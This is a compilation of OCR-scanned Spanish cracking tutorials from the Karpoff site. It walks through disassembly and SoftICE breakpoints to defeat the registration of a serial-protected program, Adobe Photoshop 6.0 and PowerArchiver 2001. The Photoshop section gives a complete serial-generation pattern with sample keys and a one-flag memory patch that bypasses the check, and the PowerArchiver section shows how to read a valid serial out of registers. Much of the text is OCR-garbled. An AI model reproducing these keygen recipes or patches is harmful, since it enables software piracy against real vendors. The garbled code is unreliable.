|:0043CBE0(U) 


Vamos a chequear en 0043CADA y veremos lo siguiente... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0043CAAD(C) 

| 

:0043CAC7 6A2D push 0000002D 

:0043CAC9 689C627B00 push 007B629C 

:0043CACE E8CD170B00 call 0O4EE2A0 <= Pondremos aquí un breakpoint 
:0043CAD3 8BFO mov esi, eax 

:0043CAD5 83C408 add esp, 00000008 

:0043CAD8 3BF5 cmp esi, ebp 


:0043CADA 0F8450010000 je 0043CC30 <= De aquí procede el salto... 


* Possible StringData Ref from Data Obj ->"SI3US" <= Me parece extraño ):) 


| 
:0043CAEO BF78335300 mov edi, 00533378 


:0043CAE5 83C9FF or ecx, FFFFFFFF 
:0043CAE8 33C0 xor eax, eax 
:0043CAEA 8BD6 mov edx, esi 
:0043CAEC F2 repnz 

:0043CAED AE scasb 

:0043CAEE F7D1 not ecx 

:0043CAFO 49 dec ecx 

:0043CAF1 81EA9C627B00 sub edx, 007B629C 
:0043CAF7 3BD1 cmp edx, ecx 


:0043CAF9 0F8531010000 j¡ne 0043CC30 
* Possible StringData Ref from Data Obj ->"SI3US" 


Agregaremos esta palabra a nuestro serial malo, el cual quedaría así SI 3US19770424. Reiniciamos el 
programa con el TRW y ponemos el breakpoint (bpx 0043CACE), presionamos Ctrl+M o F5 y a hacer el traceo 
al programa, vemos que aunque ingresemos cualquier número siempre el programa nos da el mensajito de 
que no es el correcto si subimos veremos lo siguiente... 


:0043CA40 83ECOC sub esp, 0000000C <= Pondremos el nuevo breakpoint aqui... 
:0043CA43 53 push ebx 

:0043CA44 55 push ebp 

:0043CA45 33ED xor ebp, ebp 

:0043CA47 56 push esi 

:0043CA48 57 push edi 

:0043CA49 894C2418 mov dword ptr [esp+18], ecx 
:0043CA4D C74424149C627B00 mov [esp+14], 007B629C 
:0043CA55 896C2410 mov dword ptr [esp+10], ebp 
:0043CA59 EBO2 jmp 0043CA5D 

:0043CA5B 33ED xor ebp, ebp 

:0043CA5D 8D442414 lea eax, dword ptr [esp+14] 
:0043CA61 BA64010000 mov edx, 00000164 
:0043CA66 50 push eax 

:0043CA67 B9D0E34F00 mov ecx, 004FE3DO 
:0043CA6C C6059C627B0000 mov byte ptr [007B629C], 00 
:0043CA73 E87856FCFF call 004020FO <= Esta es la función que solicita el serial 
:0043CA78 83F802 cmp eax, 00000002 
:0043CA7B 0F84C9010000 je 0043CC4A 

:0043CA81 83F801 cmp eax, 00000001 
:0043CA84 0F8558010000 jne 0043CBE2 

:0043CA8A A09C627B00 mov al, byte ptr [007B629C] 
:0043CA8F 84C0 test al, al 

:0043CA91 0F84B3010000 je 0043CC4A 

:0043CA97 B99C627B00 mov ecx, 007B629C 


:0043CA9C E83F55FFFF call 00431FEO 


:0043CAA1 A09C627B00 
:0043CAA6 BE9C627B00 
:0043CAAB 84C0 
:0043CAAD 7418 
:0043CAAF 25FF000000 
:0043CAB4 50 
:0043CAB5 E8701A0B00 
:0043CABA 83C404 
:0043CABD 8806 
:0043CABF 8A4601 
:0043CAC2 46 
:0043CAC3 84C0 
:0043CAC5 75E8 
:0043CAC7 6A2D 
:0043CAC9 689C627B00 
:0043CACE E8CD170B00 
:0043CAD3 8BF0 
:0043CAD5 83C408 
:0043CAD8 3BF5 
:0043CADA 0F8450010000 


mov al, byte ptr [007B629C] 
mov esi, 007B629C 

test al, al 

je 0043CAC7 


and eax, 000000FF <= Aqui 
push eax se 
call 004EE52A empieza 
add esp, 00000004 a 
mov byte ptr [esil, al comparar 
mov al, byte ptr [esi+01] todo 
inc esi el 
test al, al serial 
¡ne 0043CAAF <========= 


push 0000002D 
push 007B629C 
call 004EE2A0 
mov esi, eax 
add esp, 00000008 
cmp esi, ebp 
je 0043CC30 


Hemos vuelto a la dirección 0043CADA sin embargo, ya avanzamos cierto tramo en este camino, sin embargo 
siento como si estamos dando vueltas en la misma dirección. 


Ahora probemos con separar el serial de la palabra SI3US así SI3US-19770424 probamos y.... hemos pasado 
al siguiente pasado, no nos ha dado mensaje de error... y vemos lo siguiente aunque no es nada interesante 
sino nada más que algunas operaciones... 


:0043CAEO BF78335300 
:0043CAE5 83C9FF 
:0043CAE8 33C0 


mov edi, 00533378 
or ecx, FFFFFFFF 
xor eax, €ax 


En esta parte el programa empieza a comparar los caracteres de la palabra SI3US 


:0043CB15 33C9 
:0043CB17 8A8D78335300 
:0043CB1D 51 

:0043CB1E E8071A0B00 
:0043CB23 33D2 
:0043CB25 8BD8 
:0043CB27 8A959C627B00 
:0043CB2D 52 

:0043CB2E E8F7190B00 
:0043CB33 83C408 
:0043CB36 3BC3 
:0043CB38 0F85F2000000 
:0043CB3E 45 

:0043CB3F 8BC7 
:0043CB41 4F 

:0043CB42 85C0 
:0043CB44 75CF 


xor ecx, ecx 
mov cl, byte ptr [ebp+00533378] 
push ecx 
call 004EE52A 
xor edx, edx 
mov ebx, eax 
mov dl, byte ptr [ebp+007B629C] 
push edx 
call 004EE52A 
add esp, 00000008 
cmp eax, ebx 
j¡ne 0043CC30 
inc ebp 
mov eax, edi 
dec edi 
test eax, eax 
j¡ne 0043CB15 


Luego de comparar el programa regresa y chequea una segunda separación por lo que se puede deducir 
que si no está sale y da error por lo que podemos deducir que el tipo de serial es 


SI3US-19770424-SI3US 


:0043CB46 46 
:0043CB47 6A2D 
:0043CB49 56 
:0043CB4A E851170B00 
:0043CB4F 8BE8 
:0043CB51 83C408 
:0043CB54 85ED 


inc esi 

push 0000002D 
push esi 

call 0O04EE2A0 <= Aqui se extrae el guión 
mov ebp, eax 

add esp, 00000008 
test ebp, ebp 


:0043CB56 0F84D4000000 je 0043CC30 <= Si no está da error... 


:0043CB5C 8BCD mov ecx, ebp 

:0043CB5E C6450000 mov [ebp+00], 00 

:0043CB62 2BCE sub ecx, esi <= Extrae ES|-ECX 

:0043CB64 83F906 cmp ecx, 00000006 <= Si el serial no es igual a 6 es falso 


:0043CB67 0F85C3000000 j¡ne 0043CC30 <= Aqui va al mensaje de error 
Por lo que procederemos a hacer una nueva modificación a nuestro serial... ahora quedará así... 
S13US-197704-SI3US 


Haciendo todo nuevamente podemos ver que el programa luego de comparar continua pues no se cumple la 
condición de que si no es igual de error 


:0043CB6D 8A06 mov al, byte ptr [esi] <= Extrae el primer valor de 197704 
:0043CB6F 8BCE mov ecx, esi <= Mueve el valor de ESI = 197704 a ECX 
:0043CB71 8ADO mov dl, al 

:0043CB73 3AC2 cmp al, dl 

:0043CB75 750C ¡ne 0043CB83 


Vemos que no ocurre nada interesante hasta... aquí... 


:0043CB8C 8D5DO1 lea ebx, dword ptr [ebp+01] <= Extrae el último valor 
:0043CB8F 83C9FF or ecx, FFFFFFFF 

:0043CB92 8BFB mov edi, ebx 

:0043CB94 33C0 xor eax, eax 

:0043CB96 F2 repnz 

:0043CB97 AE scasb 

:0043CB98 F7D1 not ecx 

:0043CB9A 49 dec ecx 

:0043CB9B 83F905 cmp ecx, 00000005 <= Compara que tenga tamaño de cinco 
:0043CB9E 0F858C000000 ¡ne 0043CC30 <= Si así es continua 

:0043CBA4 8BCE mov ecx, esi <= Mueve 197704 a ECX 

:0043CBA6 E825D80800 call 004CA3DO0 <= Calcula un valor para comparar con la tercera parte 
:0043CBAB 8BFO mov esi, eax <= Mueve el valor de EAX a ESI 

:0043CBAD 53 push ebx 

:0043CBAE E8CF160B00 call 004EE282 <= Transforma el valor de Decimal a Hex 
:0043CBB3 83C404 add esp, 00000004 

:0043CBB6 3BFO cmp esi, eax <= Compara los dos valores 

:0043CBB8 7576 j¡ne 0043CC30 <= Si no son iguales da error 

:0043CBBA 8B0D7CF55300 mov ecx, dword ptr [0053F57C] 

:0043CBC0 689C627B00 push 007B629C 


Al escribir el comando ? EAX vemos que nuestro valor está guardado en el y el valor original está en ESI, por 
lo tanto podemos resumir que el serial del programa es igual a 


SI3US-NNNNNN-NNNNN 
EL FIN 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, aunque como RAZIEL nos dice que podemos hacer 
y deshacer con el programa, realmente yo tambien los invito a hacerlo ;o)" 


Y así doy por concluído un tuto más, saludando a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE, 
[Kalisto (okaruzic) "Salute"] y a todos los crackers hispanohablantes. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor1999-2002 


Programa: Adobe PhotoShop v6.0 


PROTECCION: Instalación: Unlock Code 


Descripcion: 


Programa de retoque fotográfico 


Dificultad: un poco lioso tal vez, pero nada complicado 
DOWNLOAD : Ni idea 


Herramientas: 


Softice y mi cabecita 


CRACKER: AuspeX FECHA: 018/03/2002 


INTRODUCCION 


Aquí tenemos un programa que, al principio, me trajo un poco de cabeza por que no trabajaba 
como otros programas que había crackeado y que eran del mismo estilo. Este se dedica a 
marearnos haciendo una serie de tonterías con el código introducido y que al final todo se reduce a 
un simple cambio de flag en memoria (1 -> código correcto, O -> código erróneo). Bueno, pues me 
llevó unas cuantas horas, estudiando el código, darme cuenta de esto (hay que entender que yo 
aun soy bastante novatillo en este mundo). 


El problema te lo encuentras únicamente en la instalación. Te sale la típica ventanita para 
registrarte, introduciendo nombre y demás, y luego el código unlock. 


| AL ATAKE 


Pues vamos allá... Arrancamos el programa de instalación y comenzamos a darle a siguiente, siguiente, etc... 
hasta que nos mánda a la ventanita de registro, así observamos algo como esto: 


Información del usuario | 


Debe completar la siguiente información para poder finalizar la 
instalación del producto de Adobe. 


El producto está registro para 


¡tl 


Tratamiento |] 

Nombre | | | 
Apelidos y qOo 
Empresa A 
Número de serie A] 


< Anterior Cancelar 


Pués nada, le metemos cualquier chorrada (no intenteis acertarlo a la primera, jeje), y le damos a siguiente, 
¿y que es lo que sucede?, púes supongo que lo que tenía que suceder: 


IN 1234567890 no es un número de serie válido Adobe Photoshop 6.0. 


“uelva a escribirlo. 


Aceptar 


Lo primero que se nos puede ocurrir aquí, quizas sea estudiar el código de los alrededores de este mensajito 
(pues sice saltaba con MessageBoxaA), pero he de decir que la cosa no era fácil, pués se llamaba a esta 
zona de código desde un CALL [EBP-24], instrucción que se ejecutaba muchísimas veces (y cuando digo 

muchísimas digo por lo menos 50 o más veces) antes y después del mensajito y por lo tanto me pareció un 
camino un tanto complicado, habiendo otros más sencillos (no se si me he explicado bien). Bueno, veamos 
entonces por donde meterle mano a esto. |Intentemoslo atacando a alguna API que recoja nuestro código. 

Después de probar alguna que otra llamada, me funcionó GetWindowTextA, tambien la famosa 

HMEMCPY, pero pensé que mejor comenzaría probando la primera ya que esta otra tiene más traceo (ese 

día estaba muy flojo como habreis podido comprobar, jeje). He de decir que me saltó 6 veces, una por cada 
cuadro de texto, y por lo tanto el que nos interesa es el último, que es el que captura nuestro número de 
serie introducido. Veamos ahora este pequeño trozo de código, que no es demasiado importante, pero que 

quiero poner para luego explicar una cosa: 


* Reference To: USER32.GetWindowTextA, Ord: 013Fh 


| 

:0042F74E FF15CC034800 Call dword ptr [004803CC] <-----Recoje el serial 

:0042F754 8D8500FCFFFF lea eax, dword ptr [ebp+FFFFFCOO] <-----eax = dirección donde recoge el serial 

:0042F75A 50 push eax 

:0042F75B 8B4508 mov eax, dword ptr [ebp+08] 

:0042F75E FF7008 push [eax+-08] 

:0042F761 E85B210300 call 004618C1 <-----Da como salida nuestro serial copiado en la dirección que hay en eax (y es 
515E10h), en edx la longitud y en ecx la dirección donde se encuentra, por decirlo de alguna manera, la otra copia original 
del serial introducido 


A partir de aquí, me tiré bastante tiempo estudiando el código que seguía para ver si realizaba alguna 
operación con el serial, no se, algo, pero no hacía nada de nada con él, parece ser que lo dejaba ahí 
olvidado y se encargaba de hacer otras cosas que no tenían nada que ver, por lo menos a mi entender. Así 
que decidí cambiar de extrategia: una vez copiado el número de serie en la dirección 515E10h (tras el último 
CALL) poner un BPM en dicho lugar para ver donde coño le metía mano, y así me dejaba de tantas historias 
y tanto traceo inútil. Volvemos pués a darle a siguiente y repetimos F5 hasta que nos coja el serial. 
Traceamos luego el código mostrado arriba hasta después del último CALL y hacemos: bd O (deshabilitamos 
el bpx de GetWindowTextA) y luego bpm eeax r (recordad que en eax está la dirección de la copia, y "r" por 
que queremos saber cuando lee de esta dirección). Veamos ahora las llamadas más importantes a la que me 

llevó dicho break, donde se le metía mano al serial: 


Exported fn(): CheckExpiringSerialNumber - Ord:0007h <-----Fijaos lo que dice aquí, parece ser que comprueba que el número 
de serie introducido no haya expirado, o sea, caducado 

:10002BDO 83ECOC sub esp, 00O00000C 

:10002BD3 53 push ebx 

:10002BD4 55 push ebp 

:10002BD5 56 push esi 

:10002BD6 8B74241C mov esi, dword ptr [esp+1C] 

:10002BDA 6A03 push 00000003 <-----Longitud 3 

:10002BDC 56 push esi <-----Dirección del serial 


* Possible StringData Ref from Data Obj ->"EXX" 


| 

:10002BDD 68E0820010 push 100082E0 <-----Dirección de la cadena "EXX" 

:10002BE2 33ED xor ebp, ebp 

:10002BE4 E8F73E0000 call 10006AEO <-----Aquí es donde se le mete mano por primera vez al serial, y lo que hace es 
comprobar si los tres primeros caracteres de nuestro serial son EXX 

:10002BE9 83C40C add esp, 0O00000C 

:10002BEC 85CO0 test eax, eax <-----Si eax <> 0 (si no cumple lo de arriba...) 

:10002BEE OF851C010000 jne 10002D10 <-----Salta fuera, y devolverá un 1 (el serial no ha expirado) 


Lo que sigue después son una serie de comprobaciones más que hace para decidir si el número ha caducado 
O no, pero que realmente no nos interesa demasiado, pues lo que nosotros queremos es buscar un serial 
que valga y no uno que ya no sirva, ¿verdad?. Pués nada, nos salimos de la función con F12, y ahí podemos 
comprobar como mete un 1 en la dirección [EBP+FFFFFB70], significa que por ahora el número es bueno 
(no ha expirado). 


Lo que sigue es un poco más complicado, por que se trata de comprobar ahora si nuestro serial es el 
correcto, realizando, para ello, una serie de operaciones con él que quizas mareen un poco. Volvemos a 
pulsar F5 para que se detenga cuando quiera meterle mano, de nuevo, al numerito. Tras un par de paradas, 
poco importantes, caemos en el siguiente trozo de código: 


* Referenced by a CALL at Address: 
|:10001€46 


¡Por aquí hace algunas operaciones absurdas como por ejemplo pasar nuestro serial a mayusculas, algo que no ;tiene mucho 
sentido si al introducir datos en el cuadro de texto del número de serie automáticamente este lo ¡transforma a mayusculas... 


[:10001947 52 push edx <-----Dirección donde se encuentra el serial 
:10001948 50 push eax <-----Dirección a donde lo va a copiar 


* Reference To: KERNEL32.IstrcpyA, Ord: 0302h 


| 

:10001949 FF1520700010 Call dword ptr [10007020] <----- Copia serial 

:1000194F 8D8C249C010000 lea ecx, dword ptr [esp+0000019C] 

:10001956 51 push ecx <-----Nueva Dirección del serial 

:10001957 E8E4030000 call 10001D40 <-----Comprueba si nuestro serial coincide con una serie de claves que hay en una zona 
de memoria, ¿aquí está lo que buscabamos?, ahora os explicaré que no es así 

:1000195C 83C404 add esp, 00000004 

:1000195F 85C0 test eax, eax <-----¿Coincide? 

:10001961 7418 je 10001978 <-----Si no es así salta 

:10001963 68D0070000 push 000007DO 


* Reference To: KERNEL32.Sleep, Ord:0296h 


| 

:10001968 FF1528700010 Call dword ptr [10007028] <-----¿Y esta tonteria pa que coño la hace?, Se queda, durante dos 
segundos, el programa parado, ¿ni idea, macho? 

:1000196E 5F pop edi 

:1000196F 5E pop esi 

:10001970 5D pop ebp 

:10001971 33C0 xor eax, eax 

:10001973 5B pop ebx 

:10001974 81C48C020000 add esp, 0000028C 

:1000197A C3 ret 


Bién, os explico un poco: ¿Veis ese CALL donde comprueba nuestro serial con otros que ya hay en 
memoria?, parece que la cosa ya esta clara ¿no?, pués resultó que no, jeje. Dentro lo que hace primero es 
transformal la clave pasando todos los caracteres por XOR eax,AA (eax contiene el caracter), y luego, como 
ya he dicho antes, compara con otras claves ya transformadas. Cuando me di cuenta de esto, lo que hice fue 
crearme un programilla que me volviera a transformar dichas claves que habia en memoria para poder 
copiarlas y comprobar que eran las correctas. Pero cual fue mi sorpresa, cuando observé que ninguno de 
esos seriales eran válidos, y entonces ¿por qué mierda comparaba mi clave con esos seriales si al final 
ninguno valía?, esto es un ejemplo de clave que utilizaba para comparar y que transformé: 
PWW250R3000406-282, claramente tiene to la pinta de número de serie, ¿verdad?, bueno, pués como 
esta había 20 o 30 claves más, y ninguna valía. La explicación de esto no la tengo clara, si alguien me lo 
puede decir... Nada, no había nada que hacer con esto, tendría que seguir traceando, a ver si encontraba de 
nuevo alguna pista, pero esta vez sin trampas. 


Encontré dos cosas que me llamaron la atención: Una de ellas es que comprobaba si mi serial comenzaba 
por los dos caracteres PW: 


:1000198D OFBFC1 movsx eax, cx 

:10001990 8A54041C mov dl, byte ptr [esp+eax+1C] <-----esp+1c apunta a mi serial 
:10001994 8A1C30 mov bl, byte ptr [eax+esi] <-----esi apunta a "PW" 

:10001997 3AD3 cmp dl, bl 

:10001999 7527 ¡ne 100019C2 

:1000199B 41 inc ecx 

:1000199C 6683F902 cmp cx, 0002 <-----Compara únicamente dos caracteres 
:100019A0 7CEB jl 1000198D 

:100019A2 EB04 jmp 10001948 


, y otra es que el cuarto caracter, empezando por el final, fuera un guión (-): 


:100019DB 8A441C1C mov al, byte ptr [esp+ebx+1C] <-----al = cuarto caracter empezando por el final 


|:100019DF 8D7C1CIC lea edi, dword ptr [esp+ebx+1C] 
:100019E3 3C2D cmp al, 2D <-----Aquí tenemos la comparación (2D es el guión en ascii) 
:100019E5 0OF853B030000 ¡ne 10001D26 


Estas dos pistas junto con las claves fantasmas que vimos anteriormente, me hicieron suponer que 
realmente el serial correcto tendría la pinta que tenían dichas claves fantasmas, es decir, PW............ _.. 
También observé que los últimos tres caracteres debían de ser números. Esto lo hacía de una forma un tanto 
extraña, pero no lo pondré para no liaros más (además era bastante código), sólo deciros que utilizaba los 
codigos ascii de los caracteres como base de una dirección la cual devolvía un valor, concretamente el 84 si 
era número y un 1 si era letra, que al aplicarle un AND valor,4 daba resultados diferentes. 


Lo que sigue a continuación son dos llamadas claves que operan con el número de serie. La primera no me 
costó demasiado trabajo darme cuenta que lo que hacía era devolver el valor del número compuesto por las 
tres últimas cifras pero transformada a hexadecimal (monta una impresionante sólo para hacer esta 
tontería). La segunda es un tanto más complicada, pués, realizan diversas operaciones matemáticas, luego 
usa los resultados parciales para, utilizándolos como base, acceder a zonas de memoria donde se encuentran 
una serie de valores, los cuales a su vez son utilizados para operar con el número de serie. La verdad, algo 
bastante complicado de seguir: 


:10001446 52 push edx <-----Dirección donde se encuentran los tres últimos dígitos (número en decimal) 
:10001AA7 E891200000 call 10003B3D <-----Transforma a hexadecimal 

:10001AAC 8BFO mov esi, eax <-----Devuelve el valor en hexadecimal y lo copia a esi 

:10001AAE 8D442420 lea eax, dword ptr [esp+20] 

:10001AB2 53 push ebx <-----Longitud = n2 caracteres serial - 4 (o sea, hasta el guión) 

:10001AB3 50 push eax <-----Dirección donde se encuentra el serial 

:10001AB4 895C2424 mov dword ptr [esp+24], ebx 

:10001AB8 E8D3F9FFFF call 10001490 <-----No tengo muy claro como trabaja exactamente (es complicado) 
:10001ABD OFBFC8 movsx ecx, ax <-----Valor devuelto de la llamada se pasa a ecx 

:10001ACO 83C40C add esp, OODOOOOC 

:10001AC3 3BCE cmp ecx, esi <-----comparamos y.. 

:10001AC5 OF855B020000 ¡ne 10001D26 <-----Si todo va bién, continua, sino, salta a tomar por culo 
:10001ACB 83FB07 cmp ebx, 00000007 <-----está mirando si hay un mínimo de 7 caracteres antes del guión 
:10001ACE 896C2410 mov dword ptr [esp+10], ebp <-----En principio está metiendo un 1 

:10001AD2 C60700 mov byte ptr [edi], 00 <-----quita el 2D (guión) y lo pone a 00 

:10001AD5 66892D308F0010 mov word ptr [10008F30], bp 

:10001ADC 7COC jl 100O1AEA <-----A tomar por culo si hay menos de 7 caracteres antes del guión 
:10001ADE 84442422 mov al, byte ptr [esp+22] <-----al = 72 caracter, ¿para que? 

:10001AE2 3C41 cmp al, 41 <-----comprueba si es mayor de A 

:10001AE4 7C04 jl 1OOO1AEA <-----Si no es así a tomar viento 

:10001AE6 3C5A cmp al, 5A <-----¿Menor o igual que Z? 

:10001AE8 7E08 jle 10001AF2 <-----salta si es así 


Veamos que podemos sacar de este trozo de código: lo primero de todo, fijaos en lo último, está 
comprobando que el caracter que ocupa la posición 7 ha de ser una letra en mayúsculas, curioso, ¿verdad?. 
Por los dos primeros CALL“s podemos saber que tres últimos dígitos poner después del guión, y es el 
resultado en decimal del valor devuelto por CALL 10001490, por ejemplo: para PW123 se devuelve 2B2, por 
lo tanto si ese es el valor que queremos que devuelva CALL 10003B3D, hemos de poner 690 que equivale a 
2B2 en decimal. Uniendo estas dos cosas obtendríamos algo como esto: PW1234A-351, pero esto sigue 
sin funcionar, falta algo más. Sigamos traceando, ya casi lo tenemos: 


p* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:10001C8C(U) 


| 
:10001C96 83C3FA add ebx, FFFFFFFA <-----ebx = n2 caracteres hasta el guión - 6, en mi caso ebx = 7 - 6 =1 
:10001C99 8D4C241C lea ecx, dword ptr [esp+1C] 


:10001C9D 53 push ebx 

:10001C9E 6A00 push 00000000 

:10001CAO 51 push ecx <-----dirección del serial sólo hasta el guión 

:10001CA1 E84AF8FFFF call 100014FO <-----devuelve los 6 caracteres antes del guión, en mi caso: W1234A 
:10001CA6 83C40C add esp, OODODOOC 

:10001CA9 EB07 ¡mp 10001CB2 


* Referenced by a (U)nconditional or (C)onditional  ump at Address: 
|:10001CC1(C) 


| 

:10001D14 8D44241C lea eax, dword ptr [esp+1C] 

:10001D18 50 push eax <-----manda los 6 caracteres antes del guión 

:10001D19 ES81F1E0000 call 10003B3D <-----comprueba si todos los caracteres son números 
:10001D1E 83C404 add esp, 00000004 

:10001D21 A3348F0010 mov dword ptr [10008F34], eax 


* Referenced by a (U)nconditional or (C)onditional | ump at Addresses: 
|:10001889(C), :10001892(C), : 100019D5(C), :100019E5(C), : 10001A36(C) 
|: 10001A69(C), :10001A9C(C), : 10001AC5(C) 


| 
:10001D26 8B442410 mov eax, dword ptr [esp+10] <-----1 -> correcto , O -> no es correcto 


Fijaos este código, digamos que sólo coge los 6 caracteres que hay antes del guión y comprueba que sólo 
sean números, por lo tanto, podríamos probar con esta otra clave a ver si funciona: PW1234A123456- 
345 


Programa de instalación de Adobe Photoshop 6.0 


¡¡¡ Prueba superadaaaaaa !!!, fijaos que sencillo, ahora podemos sacar todas las claves que nos de la gana, 
eceptuando las que sean iguales a las claves fantasmas que ya vimos. El formato que sigue es el siguiente: 
PWecccLdddddd-nnn, siendo PW obligatorio ponerlo, las cs significan cualquier caracter ya sea letra o 
número, la L ha de ser una letra (en mayúscula), las ds sólo dígitos y las n's se sacan a partir de la función 
CALL 10001490 que operaba con los caracteres que había antes del guión devolviendo así un valor 
hexadecimal y que es esas n's pero en decimal. Un ejemplo de varias claves: PW1111P111111-129, 
PW3984D108379-969, PVWNOO0(G555555-218, PWHOLAT223344-906, etc... Creo que ya se ha 
entendido, ¿no?, pues ala, ya esta todo dicho. 


NOTAS FINALES 


Sólo quería decir una cosa: en la introducción dije que todo esto se solucionaba con un simple cambio de 
flag en memoria. Vereis, mientras estudiaba este código, observé que todo esto estaba dentro de una 
llamada que siempre devolvía un valor en eax, concretamente un 0, siempre, y luego metía este resultado en 
una zona de memoria. Observad: 


[:0042A3FE FF95AOFBFFFF call dword ptr [ebp+FFFFFBAO] <-----Aquí tenemos, digamos, la llamada padre 


[:0042A404 898570FBFFFF mov dword ptr [ebp+FFFFFB70], eax <-----eax = 1 -> clave correcta, eax = 0 -> mal 
[:0042A40A EB78 ¡mp 00424484 


Luego, todo lo que os he contado se puede resumir en un simple cambio de bit, es decir, con sólo cambiar 
de O a 1 el valor que se devuelve en eax registramos correctamente el programa (digamos que cambiamos el 
flag en la dirección ebp+FFFFFB70), aunque la clave no sea la correcta, jeje, pero como comprendereis 
hubiera sido un tuto muy aburrido si sólo os hubiera contado esto, ¿verdad?, además, ya lo he dicho otras 
veces, el cracking es un arte y como tal no hay que dejarlo en un simple cambio. 


AVISO 


| No me hago responsable del uso indebido o ilegal que cualquier persona haga de este tutorial. El estudio de 
la ingeniería inversa, en mi opinión, debería de hacerse con fines didácticos y no para beneficio de ella en 
| cuanto a la desprotección de software y por consiguiente su uso ilegal. Si consideras que un programa, por 
su Calidad, merece ser comprado al precio estipulado, hazlo, los programadores de dicho software lo 
merecen, sino desinstalalo. Si realmente te apasiona el mundo de la ingeniería inversa, dedícalo sólo para tu 
aprendizage y diversión personal. 


¡Si piensas que estos tutoriales no deberían de publicarse, considero que estás muy equivocado, pués alguien 
| " " 2 
debe de mostrar a los programadores encargados de proteger las aplicaciones donde están sus fallos de 
protección, para que lo corrijan y mejoren. 


DEDICATORIA 
Quiero dedicar este tutorial a mis colegas de facultad: Rafa, Migue, Jose miguel, Manolo. A mis amigos del 


| Instituto: Reyes, Rincón, Jeremy, Dani, Marchena, Fernando, Santi... bueno, en general, a los que aguantan 
todos los días mis tonterías. 


A todo a los cracker que escriben para la página de Karpoff, y por supuesto al propio Karpoff, los cuales me 
guían en este duro camino de la ingeniería inversa. 


Nota2: Perdonad mis faltas de ortografía, soy un inculto de cojones, xDDD 


CORREO DEL MENDA: auspextAwanadoo.es 


[Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


MO] Power Archiver 2001 v7.02.08 


Descripción: Compresor y descompresor de muy buenas prestación y con soporte para más de 18 formatos 
Dificultad: Novato 

DOWNLOAD: http: //download. powerarchiver. con/powarc70208.exe 

Herramientas: Softice,W32DASM 


CRACKER: LeafaR GV FECHA: 30/09/2001 
INTRODUCCION 


Este tutorial es para novatos como yo... 

Y lo único que intento hacer es compartir y demostrar que algo he aprendido leyendo los buenos tutos, 
manuales y demas'es que he encontrado por la red y más específicamente en la pagina de Karpoff. 

Aquí analizaremos un excelente programa con el fin único de extraer un serial valido con el softice... el 
win32dASM solo lo uso para seguir el código y mostrarlo en este tuto... 


LeafaR GV aprendiz de Crack and Student of Chemical Engineering 


AL ATAKE 


Yap!!!!.... Lo primero. 
Lo de siempre revisar el archivo, su directorio, el registro. Después de todo el análisis previo no aparece nada muy 
raro excepto que esta escrito en Delphi 3.0 ((( cosa rara ?¿))). 


Vamos al Simbol Loader del SICE y cargamos el "Powerarc.exe", le damos a las rueditas dentadas (((engranajes))) y 
salta el SICE, con un F5 se abre al programa y nos aparece un bello icono que dice "register" .... Ingresamos nuestro 
datos 


Name ::::  LeafaR GV 
Serial :::: 6204076 


Con CTR-D ingresamos al SICE y ponemos el Clásico """" bpx hmemcpy """ con F5 regresamos al programa y le 
damos al botón"OK""..... Y salta el SICE, nos esta leyendo el nombre por tanto con FS saltamos al siguiente break point 
que es otro hmemcp y aquí se lee el serial 6204076. 


Ahora con unos F10 aparecemos en en POWERARC!CODE+00039190 muy cerca de un retorno de función "RET" 
antecedido por unos comandos "POP" (((Saca datos de la pila))), pero lo que nosotros buscamos es una comparación 
seguido de un salto condicional o algo parecido... 

Por tanto seguimos con FT0 hasta el final del "RET" y caemos en otro "RET" seguimos ... Ups!!! otro "RET" 
seguimos ... Yaaa!!! otro "RET" .... Adivina !! sip, otro "RET". XD XD XD XD 


Uff !!! por fin un pedazo de código ::: 


:00559748 A1047A5FOO mov eax, dword ptr 
:005597AD S03: camp byte ptr [eax], 
je 005597E9 


mov edx, dword ptr [ebp-03] 
v eax, dword ptr [ebp-04] 
D05596F8 


ES 


Tenemos una "Call", aquí es donde se genere el Serial Correcto luego esto activa o desactiva el flag (((AL))) en caso 
que nuestro serial este malo o bueno. Como era lógico entre a la "CALL" con F8 y me encontré con una mazamorra de 
llamadas y saltos que me fue imposible tracear correctamente (((( Recuerda que soy un novato ))).... 

Luego salí Y un poco más abajo me salto la ventana de error. Esa ventana de error salió mucho más atrás de la 
dirección de memoria 00559874 ***, por tanto si realizamos el salto nos evitamos la ventana de error. 

Esto comprueba las sospechas sobre el salto y la CALL teoría anterior. 


Bueno comprobamos la teoría pero aun no tenemos nuestro serial... Para solucionar este problema usamos una técnica 
un poco bruta pero que a veces funciona . Justo al llegar a la dirección de Memoria donde esta nuestra "CALL" nos 
fijamos en los registros que cambian al pasar por ella... 

La pregunta lógica sería, como se cuales registros cambian ?¿ la respuesta es simple, la ventana de registro del SICE te 
indica cuales cambian, register window (((La habilitas con el comando ""wr""))) 


Los registros que cambian de valor al pasar por la "CALL" son EAX, ECX, EDX, EIP 
EAX , es decir, que estos registros fuero usados por la rutina generadora del serial, por tanto los revisamos para ver que 
nos pueden entregar. 


: d ecx Nada útil o sospechoso 


:? ecx 25853956 


: d edx LeafaR GV._.X._. 


Ese si que tiene pinta de Serial .... Lo probamos y. 


PowerArchiver ES 


( 3 ) Registration accepted! Thank you for purchasing Powerárchiver. 


Eso seria Todo por Hoy.... 
Lo de Siempre, cualquier error o duda sobre el tuto simplemente envía un e-mail a LeafaRGV Chotmail.com . ((lo 
otro )) este tuto es solo con fines educativos y bla bla .-. 


Bueno ya pa' terminar si buscas un buen descompresor y compresor de archivos te recomiendo FilZip 2.01 soporta más 
de 14 formatos y esta bien bueno.... 


Un Saludo Y GRax A todos Los Crack ..... 


Karpoff Spanish Tutor: Pagina dedicada a la divulgación de información en Castellano, sobre 


Ingeniaría Inversa y Programación. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
